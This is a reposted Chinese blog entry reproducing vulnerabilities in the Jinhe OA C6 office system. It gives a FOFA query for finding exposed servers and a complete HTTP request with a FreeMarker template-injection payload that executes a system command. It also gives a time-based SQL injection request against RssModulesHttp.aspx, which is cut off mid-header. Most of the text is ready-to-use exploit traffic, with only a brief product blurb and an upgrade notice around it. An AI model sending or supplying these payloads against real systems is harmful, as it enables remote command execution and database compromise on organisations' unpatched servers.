自学内容网 自学内容网

漏洞复现-金和OA系列

在这里插入图片描述

🗡金和OA jc6 RCE

https://mp.weixin.qq.com/s/8VTorC_boGqtYk7qlsHyNg在这里插入图片描述

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA viewConTemplate.action存在远程命令执行漏洞。

app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”


POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

在这里插入图片描述

请联系厂家 http://www.jinher.com/升级

金和OA GetTreeDate.aspx SQL注入

【新】金和OA RssModulesHttp.aspx接口SQL注入漏洞复现

https://mp.weixin.qq.com/s/RM0gZfnSs4hsGa6MerqDog

GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML

原文地址:https://blog.csdn.net/qq_33608000/article/details/136715288

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!